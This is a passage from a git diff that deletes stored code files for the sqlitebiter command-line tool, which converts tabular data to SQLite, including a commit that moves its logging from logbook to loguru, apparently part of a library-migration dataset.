typepy.is_empty_sequence(files): - sys.exit(ExitCode.NO_INPUT) - - con = create_database(ctx, output_path) - verbosity_level = ctx.obj.get(Context.VERBOSITY_LEVEL) - extractor = get_schema_extractor(con, verbosity_level) - result_counter = ResultCounter() - - logger = logbook.Logger("sqlitebiter file") - _setup_logger(logger, ctx.obj[Context.LOG_LEVEL]) - - for file_path in files: - file_path = path.Path(file_path) - if not file_path.isfile(): - logger.debug(u"file not found: {}".format(file_path)) - result_counter.inc_fail() - continue - - logger.debug(u"converting '{}'".format(file_path)) - - try: - loader = ptr.TableFileLoader(file_path) - except ptr.InvalidFilePathError as e: - logger.debug(e) - result_counter.inc_fail() - continue - except ptr.LoaderNotFoundError: - logger.debug( - u"loader not found that coincide with '{}'".format(file_path)) - result_counter.inc_fail() - continue - - try: - for tabledata in loader.load(): - sqlite_tabledata = ptr.SQLiteTableDataSanitizer( - tabledata).sanitize() - - try: - con.create_table_from_tabledata(sqlite_tabledata) - result_counter.inc_success() - except (ValueError, IOError) as e: - logger.debug( - u"path={}, message={}".format(file_path, e)) - result_counter.inc_fail() - continue - - log_message = get_success_log_format(verbosity_level).format( - file_path, - extractor.get_table_schema_text(sqlite_tabledata.table_name).strip()) - logger.info(log_message) - except ptr.OpenError as e: - logger.error(u"open error: file={}, message='{}'".format( - file_path, str(e))) - result_counter.inc_fail() - except ptr.ValidationError as e: - logger.error( - u"invalid {} data format: path={}, message={}".format( - _get_format_type_from_path(file_path), file_path, str(e))) - result_counter.inc_fail() - except ptr.InvalidDataError as e: - logger.error( - u"invalid {} data: path={}, message={}".format( - _get_format_type_from_path(file_path), file_path, str(e))) - result_counter.inc_fail() - - write_completion_message(logger, output_path, result_counter) - - sys.exit(result_counter.get_return_code()) - - -@cmd.command() -@click.argument("url", type=str) -@click.option( - "--format", "format_name", - type=click.Choice(ptr.TableUrlLoader.get_format_name_list()), - help="Data format to loading (defaults to html).") -@click.option( - "-o", "--output-path", metavar="PATH", default="out.sqlite", - help="Output path of the SQLite database file.") -@click.option( - "--encoding", type=str, metavar="ENCODING", default="utf-8", - help="Defaults to utf-8") -@click.option( - "--proxy", type=str, metavar="PROXY", - help="Specify a proxy in the form [user:passwd@]proxy.server:port.") -@click.pass_context -def url(ctx, url, format_name, output_path, encoding, proxy): - """ - Scrape tabular data from a URL and convert data to a SQLite database file. - """ - - if typepy.is_empty_sequence(url): - sys.exit(ExitCode.NO_INPUT) - - con = create_database(ctx, output_path) - verbosity_level = ctx.obj.get(Context.VERBOSITY_LEVEL) - extractor = get_schema_extractor(con, verbosity_level) - result_counter = ResultCounter() - - logger = logbook.Logger("sqlitebiter url") - _setup_logger(logger, ctx.obj[Context.LOG_LEVEL]) - - proxies = {} - if typepy.is_not_null_string(proxy): - proxies = { - "http": proxy, - "https": proxy, - } - - try: - loader = ptr.TableUrlLoader( - url, format_name, encoding=encoding, proxies=proxies) - except ptr.LoaderNotFoundError as e: - try: - loader = ptr.TableUrlLoader( - url, "html", encoding=encoding, proxies=proxies) - except (ptr.LoaderNotFoundError, ptr.HTTPError): - logger.error(e) - sys.exit(ExitCode.FAILED_LOADER_NOT_FOUND) - except ptr.HTTPError as e: - logger.error(e) - sys.exit(ExitCode.FAILED_HTTP) - - try: - for tabledata in loader.load(): - sqlite_tabledata = ptr.SQLiteTableDataSanitizer( - tabledata).sanitize() - - try: - con.create_table_from_tabledata(sqlite_tabledata) - result_counter.inc_success() - except (ValueError) as e: - logger.debug( - u"url={}, message={}".format(url, str(e))) - result_counter.inc_fail() - continue - - log_message = get_success_log_format(verbosity_level).format( - url, - extractor.get_table_schema_text(sqlite_tabledata.table_name).strip()) - logger.info(log_message) - except ptr.InvalidDataError as e: - logger.error(u"invalid data: url={}, message={}".format(url, str(e))) - result_counter.inc_fail() - - write_completion_message(logger, output_path, result_counter) - - sys.exit(result_counter.get_return_code()) - - -@cmd.command() -@click.argument( - "credentials", type=click.Path(exists=True)) -@click.argument( - "title", type=str) -@click.option( - "-o", "--output-path", metavar="PATH", default="out.sqlite", - help="output path of the SQLite database file") -@click.pass_context -def gs(ctx, credentials, title, output_path): - """ - Convert a spreadsheet in Google Sheets to a SQLite database file. - - CREDENTIALS: OAuth2 Google credentials file. - TITLE: Title of the Google Sheets to convert. - """ - - con = create_database(ctx, output_path) - result_counter = ResultCounter() - - logger = logbook.Logger("sqlitebiter gs") - _setup_logger(logger, ctx.obj[Context.LOG_LEVEL]) - - loader = simplesqlite.loader.GoogleSheetsTableLoader() - loader.source = credentials - loader.title = title - - try: - for tabledata in loader.load(): - click.echo(u"convert '{:s}' to '{:s}' table".format( - title, tabledata.table_name)) - - try: - con.create_table_from_tabledata(tabledata) - result_counter.inc_success() - except (ptr.ValidationError, ptr.InvalidDataError): - result_counter.inc_fail() - except ptr.OpenError as e: - logger.error(e) - result_counter.inc_fail() - except AttributeError: - logger.error(u"invalid credentials data: path={}".format(credentials)) - result_counter.inc_fail() - except (ptr.ValidationError, ptr.InvalidDataError) as e: - logger.error( - u"invalid credentials data: path={}, message={}".format( - credentials, str(e))) - result_counter.inc_fail() - - write_completion_message(logger, output_path, result_counter) - - sys.exit(result_counter.get_return_code()) - - -if __name__ == '__main__': - cmd() diff --git a/v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.diff b/v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.diff deleted file mode 100644 index d47e1dd..0000000 --- a/v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.diff +++ /dev/null @@ -1,142 +0,0 @@ -diff --git a/sqlitebiter/sqlitebiter.py b/sqlitebiter/sqlitebiter.py - index a5c4b66609c342b3b6e8cc777e64a32680f6e433..311c7ce50a89316d5cab9bb2daef05315175faf2 100644 - --- a/sqlitebiter/sqlitebiter.py - +++ b/sqlitebiter/sqlitebiter.py -@@ -12,13 +12,12 @@ import sys - from textwrap import dedent - - import click --import logbook --import logbook.more - import msgfy - import path - import pytablereader as ptr - import simplesqlite as sqlite - import typepy -+from loguru import logger - - from .__version__ import __version__ - from ._common import DEFAULT_DUP_COL_HANDLER -@@ -29,7 +28,7 @@ from .subcommand import FileConverter, GoogleSheetsConverter, UrlConverter - - - CONTEXT_SETTINGS = dict(help_option_names=["-h", "--help"], obj={}) --QUIET_LOG_LEVEL = logbook.NOTSET -+QUIET_LOG_LEVEL = "QUIET" - COMMAND_EPILOG = dedent( - """\ - Documentation: https://sqlitebiter.rtfd.io/ -@@ -58,39 +57,28 @@ def create_database(database_path, dup_table): - return (sqlite.SimpleSQLite(db_path, "w"), is_create_db) - - --def make_logger(channel_name, log_level): -- import appconfigpy -- -- logger = logbook.Logger(channel_name) -+def initialize_logger(name, log_level): -+ logger.remove() - - if log_level == QUIET_LOG_LEVEL: -- try: -- logger.disable() -- except AttributeError: -- logger.disabled = True # to support Logbook<1.0.0 -- -- logger.level = log_level -- ptr.set_log_level(log_level) -- sqlite.set_log_level(log_level) -- appconfigpy.set_log_level(log_level) -- -- return logger -- -+ logger.disable(name) -+ return - --def initialize_log_handler(log_level): -- from logbook.more import ColorizedStderrHandler -- -- debug_format_str = ( -- "[{record.level_name}] {record.channel} {record.func_name} " -- "({record.lineno}): {record.message}" -- ) -- if log_level == logbook.DEBUG: -- info_format_str = debug_format_str -+ if log_level == "DEBUG": -+ log_format = ( -+ "{level: <8} | " -+ "{name}:{function}:{line} - {message}" -+ ) - else: -- info_format_str = "[{record.level_name}] {record.channel}: {record.message}" -+ log_format = "[{level}] {message}" - -- ColorizedStderrHandler(level=logbook.DEBUG, format_string=debug_format_str).push_application() -- ColorizedStderrHandler(level=logbook.INFO, format_string=info_format_str).push_application() -+ logger.add( -+ sys.stdout, colorize=True, format=log_format, level=log_level, -+ ) -+ logger.enable(name) -+ ptr.set_logger(True) -+ sqlite.set_logger(True) -+ # appconfigpy.set_logger(True) - - - def finalize(con, converter, is_create_db): -@@ -178,7 +166,7 @@ def load_convert_config(logger, config_filepath, subcommand): - ) - @click.option("--replace-symbol", "symbol_replace_value", help="Replace symbols in attributes.") - @click.option("-v", "--verbose", "verbosity_level", count=True) --@click.option("--debug", "log_level", flag_value=logbook.DEBUG, help="For debug print.") -+@click.option("--debug", "log_level", flag_value="DEBUG", help="For debug print.") - @click.option( - "-q", - "--quiet", -@@ -209,7 +197,7 @@ def cmd( - ctx.obj[Context.TYPE_INFERENCE] = not no_type_inference - ctx.obj[Context.TYPE_HINT_HEADER] = is_type_hint_header - ctx.obj[Context.VERBOSITY_LEVEL] = verbosity_level -- ctx.obj[Context.LOG_LEVEL] = logbook.INFO if log_level is None else log_level -+ ctx.obj[Context.LOG_LEVEL] = "INFO" if log_level is None else log_level - - sqlite.SimpleSQLite.dup_col_handler = DEFAULT_DUP_COL_HANDLER - -@@ -242,8 +230,7 @@ def file(ctx, files, recursive, pattern, exclude, follow_symlinks, format_name, - file(s) or named pipes to a SQLite database file. - """ - -- initialize_log_handler(ctx.obj[Context.LOG_LEVEL]) -- logger = make_logger("{:s} file".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) -+ initialize_logger("{:s} file".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - - if typepy.is_empty_sequence(files): - logger.error("require at least one file specification.\n\n{}".format(ctx.get_help())) -@@ -322,8 +309,7 @@ def url(ctx, url, format_name, encoding, proxy): - if typepy.is_empty_sequence(url): - sys.exit(ExitCode.NO_INPUT) - -- initialize_log_handler(ctx.obj[Context.LOG_LEVEL]) -- logger = make_logger("{:s} url".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) -+ initialize_logger("{:s} url".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - - try: - app_configs = app_config_mgr.load() -@@ -373,8 +359,7 @@ def gs(ctx, credentials, title): - TITLE: Title of the Google Sheets to convert. - """ - -- initialize_log_handler(ctx.obj[Context.LOG_LEVEL]) -- logger = make_logger("{:s} gs".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) -+ initialize_logger("{:s} gs".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - con, is_create_db = create_database(ctx.obj[Context.OUTPUT_PATH], ctx.obj[Context.DUP_DATABASE]) - convert_configs = load_convert_config( - logger, ctx.obj[Context.CONVERT_CONFIG], subcommand="file" -@@ -410,7 +395,7 @@ def configure(ctx): - You can remove these settings by deleting '~/.sqlitebiter'. - """ - -- logger = make_logger("{:s} file".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) -+ initialize_logger("{:s} file".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - - logger.debug("{} configuration file existence: {}".format(PROGRAM_NAME, app_config_mgr.exists)) - diff --git a/v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.source.py b/v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.source.py deleted file mode 100644 index 0183165..0000000 --- a/v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.source.py +++ /dev/null @@ -1,500 +0,0 @@ -#!/usr/bin/env python -# encoding: utf-8 - -""" -.. codeauthor:: Tsuyoshi Hombashi -""" - -from __future__ import absolute_import - -import os -import sys -from textwrap import dedent - -import click -import logbook -import logbook.more -import msgfy -import path -import pytablereader as ptr -import simplesqlite as sqlite -import typepy - -from .__version__ import __version__ -from ._common import DEFAULT_DUP_COL_HANDLER -from ._config import ConfigKey, app_config_mgr -from ._const import IPYNB_FORMAT_NAME_LIST, PROGRAM_NAME, ExitCode -from ._enum import Context, DupDatabase -from .subcommand import FileConverter, GoogleSheetsConverter, UrlConverter - - -CONTEXT_SETTINGS = dict(help_option_names=["-h", "--help"], obj={}) -QUIET_LOG_LEVEL = logbook.NOTSET -COMMAND_EPILOG = dedent( - """\ - Documentation: https://sqlitebiter.rtfd.io/ - Issue tracker: https://github.com/thombashi/sqlitebiter/issues - """ -) - - -class Default(object): - OUTPUT_FILE = "out.sqlite" - ENCODING = "utf-8" - - -def create_database(database_path, dup_table): - db_path = path.Path(database_path) - dir_path = db_path.dirname() - - if typepy.is_not_null_string(dir_path): - dir_path.makedirs_p() - - is_create_db = not db_path.isfile() - - if dup_table == DupDatabase.APPEND: - return (sqlite.SimpleSQLite(db_path, "a"), is_create_db) - - return (sqlite.SimpleSQLite(db_path, "w"), is_create_db) - - -def make_logger(channel_name, log_level): - import appconfigpy - - logger = logbook.Logger(channel_name) - - if log_level == QUIET_LOG_LEVEL: - try: - logger.disable() - except AttributeError: - logger.disabled = True # to support Logbook<1.0.0 - - logger.level = log_level - ptr.set_log_level(log_level) - sqlite.set_log_level(log_level) - appconfigpy.set_log_level(log_level) - - return logger - - -def initialize_log_handler(log_level): - from logbook.more import ColorizedStderrHandler - - debug_format_str = ( - "[{record.level_name}] {record.channel} {record.func_name} " - "({record.lineno}): {record.message}" - ) - if log_level == logbook.DEBUG: - info_format_str = debug_format_str - else: - info_format_str = "[{record.level_name}] {record.channel}: {record.message}" - - ColorizedStderrHandler(level=logbook.DEBUG, format_string=debug_format_str).push_application() - ColorizedStderrHandler(level=logbook.INFO, format_string=info_format_str).push_application() - - -def finalize(con, converter, is_create_db): - converter.write_completion_message() - database_path = con.database_path - con.close() - - if all([os.path.isfile(database_path), converter.get_success_count() == 0, is_create_db]): - os.remove(database_path) - - return converter.get_return_code() - - -def load_convert_config(logger, config_filepath, subcommand): - import simplejson as json - import io - - if not config_filepath: - return {} - - if not os.path.isfile(config_filepath): - logger.debug("{} not found".format(config_filepath)) - return {} - - with io.open(config_filepath, encoding="utf-8") as f: - configs = json.load(f) - - return configs.get(subcommand) - - -@click.group(context_settings=CONTEXT_SETTINGS) -@click.version_option(version=__version__, message="%(prog)s %(version)s") -@click.option( - "-o", - "--output-path", - metavar="PATH", - default=Default.OUTPUT_FILE, - help="Output path of the SQLite database file. Defaults to '{:s}'.".format(Default.OUTPUT_FILE), -) -@click.option( - "-a", "--append", "is_append_table", is_flag=True, help="Append table(s) to existing database." -) -@click.option( - "--add-primary-key", - "add_pri_key_name", - metavar="PRIMARY_KEY_NAME", - help="Add 'PRIMARY KEY AUTOINCREMENT' column with the specified name.", -) -@click.option( - "--convert-config", - help=dedent( - """\ - [experimental] - Configurations for data conversion. The option can be used only for url subcommand. - """ - ), -) -@click.option( - "-i", - "--index", - "index_list", - metavar="INDEX_ATTR", - default="", - help="Comma separated attribute names to create indices.", -) -@click.option( - "--no-type-inference", - is_flag=True, - help="All of the columns assume as TEXT data type in creating tables.", -) -@click.option( - "--type-hint-header", - "is_type_hint_header", - is_flag=True, - help=dedent( - """\ - Use headers suffix as type hints. - If there are type hints, converting columns by datatype corresponding with type hints. - The following suffixes can be recognized as type hints (case insensitive): - "text": TEXT datatype. - "integer": INTEGER datatype. - "real": REAL datatype. - """ - ), -) -@click.option("--replace-symbol", "symbol_replace_value", help="Replace symbols in attributes.") -@click.option("-v", "--verbose", "verbosity_level", count=True) -@click.option("--debug", "log_level", flag_value=logbook.DEBUG, help="For debug print.") -@click.option( - "-q", - "--quiet", - "log_level", - flag_value=QUIET_LOG_LEVEL, - help="Suppress execution log messages.", -) -@click.pass_context -def cmd( - ctx, - output_path, - is_append_table, - add_pri_key_name, - convert_config, - index_list, - no_type_inference, - is_type_hint_header, - symbol_replace_value, - verbosity_level, - log_level, -): - ctx.obj[Context.OUTPUT_PATH] = output_path - ctx.obj[Context.SYMBOL_REPLACE_VALUE] = symbol_replace_value - ctx.obj[Context.DUP_DATABASE] = DupDatabase.APPEND if is_append_table else DupDatabase.OVERWRITE - ctx.obj[Context.ADD_PRIMARY_KEY_NAME] = add_pri_key_name - ctx.obj[Context.INDEX_LIST] = index_list.split(",") - ctx.obj[Context.CONVERT_CONFIG] = convert_config - ctx.obj[Context.TYPE_INFERENCE] = not no_type_inference - ctx.obj[Context.TYPE_HINT_HEADER] = is_type_hint_header - ctx.obj[Context.VERBOSITY_LEVEL] = verbosity_level - ctx.obj[Context.LOG_LEVEL] = logbook.INFO if log_level is None else log_level - - sqlite.SimpleSQLite.dup_col_handler = DEFAULT_DUP_COL_HANDLER - - -@cmd.command(epilog=COMMAND_EPILOG) -@click.argument("files", type=str, nargs=-1) -@click.option( - "-r", "--recursive", is_flag=True, help="Read all files under each directory, recursively." -) -@click.option("--pattern", metavar="PATTERN", help="Convert files matching PATTERN.") -@click.option("--exclude", metavar="PATTERN", help="Exclude files matching PATTERN.") -@click.option("--follow-symlinks", is_flag=True, help="Follow symlinks.") -@click.option( - "-f", - "--format", - "format_name", - type=click.Choice(ptr.TableFileLoader.get_format_names() + IPYNB_FORMAT_NAME_LIST), - help="Data format to loading (auto-detect from file extensions in default).", -) -@click.option( - "--encoding", - metavar="ENCODING", - help="Encoding to load files. Auto-detection from files in default.", -) -@click.pass_context -def file(ctx, files, recursive, pattern, exclude, follow_symlinks, format_name, encoding): - """ - Convert tabular data within - CSV/Excel/HTML/JSON/Jupyter Notebook/LDJSON/LTSV/Markdown/Mediawiki/SQLite/SSV/TSV - file(s) or named pipes to a SQLite database file. - """ - - initialize_log_handler(ctx.obj[Context.LOG_LEVEL]) - logger = make_logger("{:s} file".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - - if typepy.is_empty_sequence(files): - logger.error("require at least one file specification.\n\n{}".format(ctx.get_help())) - sys.exit(ExitCode.NO_INPUT) - - convert_configs = load_convert_config( - logger, ctx.obj[Context.CONVERT_CONFIG], subcommand="file" - ) - - con, is_create_db = create_database(ctx.obj[Context.OUTPUT_PATH], ctx.obj[Context.DUP_DATABASE]) - converter = FileConverter( - logger=logger, - con=con, - symbol_replace_value=ctx.obj[Context.SYMBOL_REPLACE_VALUE], - add_pri_key_name=ctx.obj[Context.ADD_PRIMARY_KEY_NAME], - convert_configs=convert_configs, - index_list=ctx.obj.get(Context.INDEX_LIST), - is_type_inference=ctx.obj[Context.TYPE_INFERENCE], - is_type_hint_header=ctx.obj[Context.TYPE_HINT_HEADER], - verbosity_level=ctx.obj.get(Context.VERBOSITY_LEVEL), - format_name=format_name, - encoding=encoding, - exclude_pattern=exclude, - follow_symlinks=follow_symlinks, - ) - - for file_path in files: - dir_path_obj = path.Path(file_path) - - if not follow_symlinks and dir_path_obj.islink() and dir_path_obj.isdir(): - logger.debug( - "skip symlink to a directory: {} -> {}".format( - dir_path_obj, dir_path_obj.readlink() - ) - ) - continue - - if recursive and dir_path_obj.isdir(): - for file_path_obj in dir_path_obj.walkfiles(pattern): - converter.convert(file_path_obj) - else: - converter.convert(file_path) - - sys.exit(finalize(con, converter, is_create_db)) - - -@cmd.command(epilog=COMMAND_EPILOG) -@click.argument("url", type=str) -@click.option( - "-f", - "--format", - "format_name", - type=click.Choice(ptr.TableUrlLoader.get_format_names() + IPYNB_FORMAT_NAME_LIST), - help="Data format to loading (defaults to html).", -) -@click.option( - "-e", - "--encoding", - type=str, - metavar="ENCODING", - help="HTML page read encoding. Defaults to {:s}.".format(Default.ENCODING), -) -@click.option( - "-p", - "--proxy", - type=str, - metavar="PROXY", - help="Specify a proxy in the form [user:passwd@]proxy.server:port.", -) -@click.pass_context -def url(ctx, url, format_name, encoding, proxy): - """ - Scrape tabular data from a URL and convert data to a SQLite database file. - """ - - if typepy.is_empty_sequence(url): - sys.exit(ExitCode.NO_INPUT) - - initialize_log_handler(ctx.obj[Context.LOG_LEVEL]) - logger = make_logger("{:s} url".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - - try: - app_configs = app_config_mgr.load() - except ValueError as e: - logger.debug(msgfy.to_debug_message(e)) - app_configs = {} - - if typepy.is_empty_sequence(encoding): - encoding = app_configs.get(ConfigKey.DEFAULT_ENCODING) - logger.debug("use default encoding: {}".format(encoding)) - - if typepy.is_null_string(proxy): - proxy = app_configs.get(ConfigKey.PROXY_SERVER) - - convert_configs = load_convert_config(logger, ctx.obj[Context.CONVERT_CONFIG], subcommand="url") - - con, is_create_db = create_database(ctx.obj[Context.OUTPUT_PATH], ctx.obj[Context.DUP_DATABASE]) - converter = UrlConverter( - logger=logger, - con=con, - symbol_replace_value=ctx.obj[Context.SYMBOL_REPLACE_VALUE], - add_pri_key_name=ctx.obj[Context.ADD_PRIMARY_KEY_NAME], - convert_configs=convert_configs, - index_list=ctx.obj.get(Context.INDEX_LIST), - is_type_inference=ctx.obj[Context.TYPE_INFERENCE], - is_type_hint_header=ctx.obj[Context.TYPE_HINT_HEADER], - verbosity_level=ctx.obj.get(Context.VERBOSITY_LEVEL), - format_name=format_name, - encoding=encoding, - proxy=proxy, - ) - - converter.convert(url) - - sys.exit(finalize(con, converter, is_create_db)) - - -@cmd.command(epilog=COMMAND_EPILOG) -@click.argument("credentials", type=click.Path(exists=True)) -@click.argument("title", type=str) -@click.pass_context -def gs(ctx, credentials, title): - """ - Convert a spreadsheet in Google Sheets to a SQLite database file. - - CREDENTIALS: OAuth2 Google credentials file. - TITLE: Title of the Google Sheets to convert. - """ - - initialize_log_handler(ctx.obj[Context.LOG_LEVEL]) - logger = make_logger("{:s} gs".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - con, is_create_db = create_database(ctx.obj[Context.OUTPUT_PATH], ctx.obj[Context.DUP_DATABASE]) - convert_configs = load_convert_config( - logger, ctx.obj[Context.CONVERT_CONFIG], subcommand="file" - ) - - converter = GoogleSheetsConverter( - logger=logger, - con=con, - symbol_replace_value=ctx.obj[Context.SYMBOL_REPLACE_VALUE], - add_pri_key_name=ctx.obj[Context.ADD_PRIMARY_KEY_NAME], - convert_configs=convert_configs, - index_list=ctx.obj.get(Context.INDEX_LIST), - is_type_inference=ctx.obj[Context.TYPE_INFERENCE], - is_type_hint_header=ctx.obj[Context.TYPE_HINT_HEADER], - verbosity_level=ctx.obj.get(Context.VERBOSITY_LEVEL), - ) - - converter.convert(credentials, title) - - sys.exit(finalize(con, converter, is_create_db)) - - -@cmd.command() -@click.pass_context -def configure(ctx): - """ - Configure the following application settings: - - (1) Default encoding to load files. - (2) HTTP/HTTPS proxy server URI (for url sub-command). - - Configurations are written to '~/.sqlitebiter'. - You can remove these settings by deleting '~/.sqlitebiter'. - """ - - logger = make_logger("{:s} file".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - - logger.debug("{} configuration file existence: {}".format(PROGRAM_NAME, app_config_mgr.exists)) - - sys.exit(app_config_mgr.configure()) - - -@cmd.command(epilog=COMMAND_EPILOG) -@click.argument("shell", type=click.Choice(["bash", "zsh"])) -@click.pass_context -def completion(ctx, shell): - """ - A helper command to setup command completion. - - To setup for bash: - - sqlitebiter completion bash >> ~/.bashrc - - To setup for zsh: - - sqlitebiter completion zsh >> ~/.zshrc - """ - - if shell == "bash": - click.echo( - dedent( - """\ - _sqlitebiter_completion() { - local IFS=$' - ' - COMPREPLY=( $( env COMP_WORDS="${COMP_WORDS[*]}" \ - COMP_CWORD=$COMP_CWORD \ - _SQLITEBITER_COMPLETE=complete $1 ) ) - return 0 - } - - _sqlitebiter_completionetup() { - local COMPLETION_OPTIONS="" - local BASH_VERSION_ARR=(${BASH_VERSION//./ }) - # Only BASH version 4.4 and later have the nosort option. - if [ ${BASH_VERSION_ARR[0]} -gt 4 ] || ([ ${BASH_VERSION_ARR[0]} -eq 4 ] && [ ${BASH_VERSION_ARR[1]} -ge 4 ]); then - COMPLETION_OPTIONS="-o nosort" - fi - - complete $COMPLETION_OPTIONS -F _sqlitebiter_completion sqlitebiter - } - """ - ) - ) - elif shell == "zsh": - click.echo( - dedent( - """\ - _sqlitebiter_completion() { - local -a completions - local -a completions_with_descriptions - local -a response - response=("${(@f)$( env COMP_WORDS="${words[*]}" \ - COMP_CWORD=$((CURRENT-1)) \ - _SQLITEBITER_COMPLETE="complete_zsh" \ - sqlitebiter )}") - - for key descr in ${(kv)response}; do - if [[ "$descr" == "_" ]]; then - completions+=("$key") - else - completions_with_descriptions+=("$key":"$descr") - fi - done - - if [ -n "$completions_with_descriptions" ]; then - _describe -V unsorted completions_with_descriptions -U -Q - fi - - if [ -n "$completions" ]; then - compadd -U -V unsorted -Q -a completions - fi - compstate[insert]="automenu" - } - - compdef _sqlitebiter_completion sqlitebiter; - """ - ) - ) - - -if __name__ == "__main__": - cmd() diff --git a/v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.target.py b/v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.target.py deleted file mode 100644 index cd30b20..0000000 --- a/v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.target.py +++ /dev/null @@ -1,485 +0,0 @@ -#!/usr/bin/env python -# encoding: utf-8 - -""" -.. codeauthor:: Tsuyoshi Hombashi -""" - -from __future__ import absolute_import - -import os -import sys -from textwrap import dedent - -import click -import msgfy -import path -import pytablereader as ptr -import simplesqlite as sqlite -import typepy -from loguru import logger - -from .__version__ import __version__ -from ._common import DEFAULT_DUP_COL_HANDLER -from ._config import ConfigKey, app_config_mgr -from ._const import IPYNB_FORMAT_NAME_LIST, PROGRAM_NAME, ExitCode -from ._enum import Context, DupDatabase -from .subcommand import FileConverter, GoogleSheetsConverter, UrlConverter - - -CONTEXT_SETTINGS = dict(help_option_names=["-h", "--help"], obj={}) -QUIET_LOG_LEVEL = "QUIET" -COMMAND_EPILOG = dedent( - """\ - Documentation: https://sqlitebiter.rtfd.io/ - Issue tracker: https://github.com/thombashi/sqlitebiter/issues - """ -) - - -class Default(object): - OUTPUT_FILE = "out.sqlite" - ENCODING = "utf-8" - - -def create_database(database_path, dup_table): - db_path = path.Path(database_path) - dir_path = db_path.dirname() - - if typepy.is_not_null_string(dir_path): - dir_path.makedirs_p() - - is_create_db = not db_path.isfile() - - if dup_table == DupDatabase.APPEND: - return (sqlite.SimpleSQLite(db_path, "a"), is_create_db) - - return (sqlite.SimpleSQLite(db_path, "w"), is_create_db) - - -def initialize_logger(name, log_level): - logger.remove() - - if log_level == QUIET_LOG_LEVEL: - logger.disable(name) - return - - if log_level == "DEBUG": - log_format = ( - "{level: <8} | " - "{name}:{function}:{line} - {message}" - ) - else: - log_format = "[{level}] {message}" - - logger.add( - sys.stdout, colorize=True, format=log_format, level=log_level, - ) - logger.enable(name) - ptr.set_logger(True) - sqlite.set_logger(True) - # appconfigpy.set_logger(True) - - -def finalize(con, converter, is_create_db): - converter.write_completion_message() - database_path = con.database_path - con.close() - - if all([os.path.isfile(database_path), converter.get_success_count() == 0, is_create_db]): - os.remove(database_path) - - return converter.get_return_code() - - -def load_convert_config(logger, config_filepath, subcommand): - import simplejson as json - import io - - if not config_filepath: - return {} - - if not os.path.isfile(config_filepath): - logger.debug("{} not found".format(config_filepath)) - return {} - - with io.open(config_filepath, encoding="utf-8") as f: - configs = json.load(f) - - return configs.get(subcommand) - - -@click.group(context_settings=CONTEXT_SETTINGS) -@click.version_option(version=__version__, message="%(prog)s %(version)s") -@click.option( - "-o", - "--output-path", - metavar="PATH", - default=Default.OUTPUT_FILE, - help="Output path of the SQLite database file. Defaults to '{:s}'.".format(Default.OUTPUT_FILE), -) -@click.option( - "-a", "--append", "is_append_table", is_flag=True, help="Append table(s) to existing database." -) -@click.option( - "--add-primary-key", - "add_pri_key_name", - metavar="PRIMARY_KEY_NAME", - help="Add 'PRIMARY KEY AUTOINCREMENT' column with the specified name.", -) -@click.option( - "--convert-config", - help=dedent( - """\ - [experimental] - Configurations for data conversion. The option can be used only for url subcommand. - """ - ), -) -@click.option( - "-i", - "--index", - "index_list", - metavar="INDEX_ATTR", - default="", - help="Comma separated attribute names to create indices.", -) -@click.option( - "--no-type-inference", - is_flag=True, - help="All of the columns assume as TEXT data type in creating tables.", -) -@click.option( - "--type-hint-header", - "is_type_hint_header", - is_flag=True, - help=dedent( - """\ - Use headers suffix as type hints. - If there are type hints, converting columns by datatype corresponding with type hints. - The following suffixes can be recognized as type hints (case insensitive): - "text": TEXT datatype. - "integer": INTEGER datatype. - "real": REAL datatype. - """ - ), -) -@click.option("--replace-symbol", "symbol_replace_value", help="Replace symbols in attributes.") -@click.option("-v", "--verbose", "verbosity_level", count=True) -@click.option("--debug", "log_level", flag_value="DEBUG", help="For debug print.") -@click.option( - "-q", - "--quiet", - "log_level", - flag_value=QUIET_LOG_LEVEL, - help="Suppress execution log messages.", -) -@click.pass_context -def cmd( - ctx, - output_path, - is_append_table, - add_pri_key_name, - convert_config, - index_list, - no_type_inference, - is_type_hint_header, - symbol_replace_value, - verbosity_level, - log_level, -): - ctx.obj[Context.OUTPUT_PATH] = output_path - ctx.obj[Context.SYMBOL_REPLACE_VALUE] = symbol_replace_value - ctx.obj[Context.DUP_DATABASE] = DupDatabase.APPEND if is_append_table else DupDatabase.OVERWRITE - ctx.obj[Context.ADD_PRIMARY_KEY_NAME] = add_pri_key_name - ctx.obj[Context.INDEX_LIST] = index_list.split(",") - ctx.obj[Context.CONVERT_CONFIG] = convert_config - ctx.obj[Context.TYPE_INFERENCE] = not no_type_inference - ctx.obj[Context.TYPE_HINT_HEADER] = is_type_hint_header - ctx.obj[Context.VERBOSITY_LEVEL] = verbosity_level - ctx.obj[Context.LOG_LEVEL] = "INFO" if log_level is None else log_level - - sqlite.SimpleSQLite.dup_col_handler = DEFAULT_DUP_COL_HANDLER - - -@cmd.command(epilog=COMMAND_EPILOG) -@click.argument("files", type=str, nargs=-1) -@click.option( - "-r", "--recursive", is_flag=True, help="Read all files under each directory, recursively." -) -@click.option("--pattern", metavar="PATTERN", help="Convert files matching PATTERN.") -@click.option("--exclude", metavar="PATTERN", help="Exclude files matching PATTERN.") 